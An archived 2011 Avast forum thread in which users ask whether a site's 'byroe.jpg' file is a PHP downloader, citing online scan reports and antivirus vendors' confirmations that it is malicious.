Author Topic: Does site have a PHP downloader?  (Read 2898 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Does site have a PHP downloader?
« on: August 10, 2011, 06:39:49 PM »
See: http://www.virustotal.com/url-scan/report.html?id=d9f0ee71954863bb7354906ebfce4b37-1312985843
and accompanying scan: http://www.virustotal.com/file-scan/report.html?id=ac50e4038d7ef80770860138896415178a156eca38e31d725a598fa8b1f611ce-1312993064
Also consider this: http://anubis.iseclab.org/?action=result&task_id=1fd2bde677aeabbb439a866659e5952b9&format=html
Only flag is from Clamav
 WARNING! FILE MAY BE INFECTED!
Clamav
byroe.jpg: PHP.Downloader FOUND
----------- SCAN SUMMARY -----------
Infected files: 1
Time: 0.005 sec (0 m 0 s)
Is this real or a false positive  (see attached gif image)

Here the site is given clean: http://www.urlvoid.com/scan/bichoquerido.com
Here also sucuri:
status:   Verified Clean
web trust:     Not Blacklisted

polonus
« Last Edit: August 11, 2011, 05:05:58 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Does site have a PHP downloader?
« Reply #1 on: August 10, 2011, 09:45:12 PM »
My forum friends,

As this probably should be detected as "PHP:Multicom-B" by avast's webshield, as is my guess, it is not, but what happens is that I am stopped from going there by BitDefender TrafficLight extension in my Google Chrome browser.
Here it was not being detected: http://wepawet.cs.ucsb.edu/view.php?hash=224171abb521a8bad1b8084974fc6c78&t=1313005017&type=js
But is in this database as RFI attack site: -http://www.bizimbal.com/odb/details.html?id=976939

polonus
« Last Edit: August 11, 2011, 05:06:23 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37507
  • Not a avast user
Re: Does site have a PHP downloader?
« Reply #2 on: August 11, 2011, 10:41:12 AM »
This is what Avira say
Quote
The file 'byroe.jpg' has been determined to be 'MALWARE'.Our analysts named the threat PHP/Dldr.Zit.J.The term "PHP/" denotes a PHP scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.


and SOPHOS
Quote
The file(s) submitted were malicious in nature and detection will be available on the Sophos Databank shortly.


Norman
Quote
Its been cleared that the file is malicious and has a behavior of a downloading a bot file and executes it.
byroe.jpg : Processed - PHP/Dloader.AE

« Last Edit: August 12, 2011, 08:27:48 AM by Pondus »